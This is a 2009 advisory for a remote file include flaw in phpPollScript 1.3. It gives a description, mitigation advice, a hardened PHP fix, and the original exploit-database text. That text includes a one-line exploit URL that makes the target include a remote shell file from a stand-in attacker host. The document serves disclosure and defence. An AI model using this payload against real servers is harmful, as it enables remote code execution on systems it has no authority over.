Vendor: phpPollScript
Author: cr4wl3r
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Include
CWE: 98
Product Name: phpPollScript
Affected Version From: 1.3 and earlier
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

phpPollScript <= 1.3 Remote File Include Vulnerability

A vulnerability exists in phpPollScript version 1.3 and earlier that allows a remote attacker to include arbitrary files on the vulnerable system. The 'include_class' parameter in 'init.poll.php' is not sanitized before it is used to build the path passed to 'require': the script takes dirname() of the parameter and appends '/voting.poll.php'. Because the parameter may carry a URL, an attacker can make the script include a file from a remote host, which leads to execution of arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of phpPollScript or apply the patch from the vendor.
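As an added illustration (not vendor code and not part of the Exploit-DB entry), the two affected lines are shown beside a hardened replacement that never derives the include path from request data. It assumes voting.poll.php ships in the same directory as init.poll.php and that, as the exploit URL implies, $include_class was being populated from the query string (for example via register_globals); the constant name POLL_INC_DIR is an invented label.

```php
<?php
// BEFORE (init.poll.php lines 2-3 as reported): the directory of the include is
// taken from $include_class, which the exploit URL shows is attacker-controlled.
//   $inc_path = dirname($include_class);
//   require ($inc_path."/voting.poll.php");

// AFTER (added example, not the vendor's patch): the include directory is a
// constant fixed at install time; nothing from the request participates in the path.
// Assumption: voting.poll.php lives in the same directory as init.poll.php.
define('POLL_INC_DIR', __DIR__);

// If register_globals is on, a request parameter named include_class would
// already have populated $include_class; clear it so no later code can trust it.
unset($include_class);

$inc_file = POLL_INC_DIR . DIRECTORY_SEPARATOR . 'voting.poll.php';

// realpath() resolves symlinks and '..' and returns false for a missing file;
// the prefix check then guarantees the resolved file is still inside POLL_INC_DIR,
// so neither a URL nor a traversal sequence can ever reach the require below.
$resolved = realpath($inc_file);
$base     = realpath(POLL_INC_DIR) . DIRECTORY_SEPARATOR;
if ($resolved === false || strncmp($resolved, $base, strlen($base)) !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('poll include misconfigured');
}
require $resolved;
```

Independently of the application fix, the remote half of this CWE-98 class only works when PHP is allowed to open URLs in include/require, so setting allow_url_include = Off in php.ini (and allow_url_fopen = Off where the application does not need it) is the server-side control to verify alongside the upgrade.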

Exploit-DB raw data:

########################################################################
#phpPollScript <= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  cr4wl3r 
#Contact              :  cr4wl3r[4t]linuxmail[dot]org 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test/
########################################################################
#Greetz        : MyMom [alm]
#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################

# milw0rm.com [2009-09-16]